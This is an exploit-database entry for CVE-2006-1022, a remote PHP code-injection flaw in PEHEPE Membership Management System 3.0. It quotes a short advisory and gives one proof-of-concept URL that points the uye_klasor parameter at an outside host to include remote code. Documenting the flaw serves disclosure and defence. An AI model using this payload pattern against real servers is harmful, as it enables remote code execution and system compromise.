PEHEPE Membership Management System 3.0 - Remote PHP Script Code Injection
| EKU-ID: 32631 | CVE: CVE-2006-1022;OSVDB-23567 | OSVDB-ID: |
| Author: Yunus Emre Yilmaz | Published: 2006-02-28 | Verified:
 |
| Download: | ||
Rating☆☆☆☆☆ |
| EKU-ID: 32631 | CVE: CVE-2006-1022;OSVDB-23567 | OSVDB-ID: |
| Author: Yunus Emre Yilmaz | Published: 2006-02-28 | Verified:
|
| Download: | ||
Rating☆☆☆☆☆ |
source: https://www.securityfocus.com/bid/16887/info PEHEPE Membership Management System is prone to a remote PHP code-injection vulnerability. An attacker can exploit this issue to facilitate a compromise of the application and the underlying system; other attacks are also possible. PEHEPE Membership Management System version 3 is vulnerable to this issue; other versions may also be affected. http://www.example.com/sol_menu.php?uye_klasor=http://www.example.org&misafir[]=UYE_SEVIYE